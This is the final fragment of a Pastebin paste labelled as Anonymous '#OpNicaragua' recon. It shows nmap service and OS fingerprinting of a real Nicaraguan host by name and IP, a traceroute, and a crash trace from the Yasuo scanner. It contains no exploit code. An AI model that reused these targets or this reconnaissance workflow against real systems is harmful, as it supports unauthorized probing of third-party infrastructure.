  700. SF:er\x20Ready\x20\r\n-ERR\x20Invalid\x20command\r\n-ERR\x20Invalid\x20com
  701. SF:mand\r\n")%r(HTTPOptions,3F,"-ERR\x20Invalid\x20command\r\n-ERR\x20Inva
  702. SF:lid\x20command\r\n\+OK\x20Server\x20Ready\x20\r\n");
  703. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  704. Device type: WAP
  705. Running: D-Link embedded, TRENDnet embedded
  706. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp
  707. OS details: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP
  708. Network Distance: 1 hop
  709.  
  710. TRACEROUTE (using port 443/tcp)
  711. HOP RTT ADDRESS
  712. 1 544.31 ms ns1.eaai.com.ni (190.212.137.165)
  713.  
  714. #######################################################################################################################################
  715. I, [2018-07-20T17:13:44.645938 #14869] INFO -- : Initiating port scan
  716. Traceback (most recent call last):
  717. 3: from yasuo.rb:700:in `<main>'
  718. 2: from yasuo.rb:132:in `run'
  719. 1: from yasuo.rb:232:in `process_nmap_scan'
  720. yasuo.rb:232:in `each_slice': invalid slice size (ArgumentError)
  721. I, [2018-07-20T17:13:48.570743 #14869] INFO -- : Using nmap scan output file logs/nmap_output_2018-07-20_17-13-44.xml
  722. #######################################################################################################################################
  723. Anonymous #OpNicaragua JTSEC Full Recon #11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!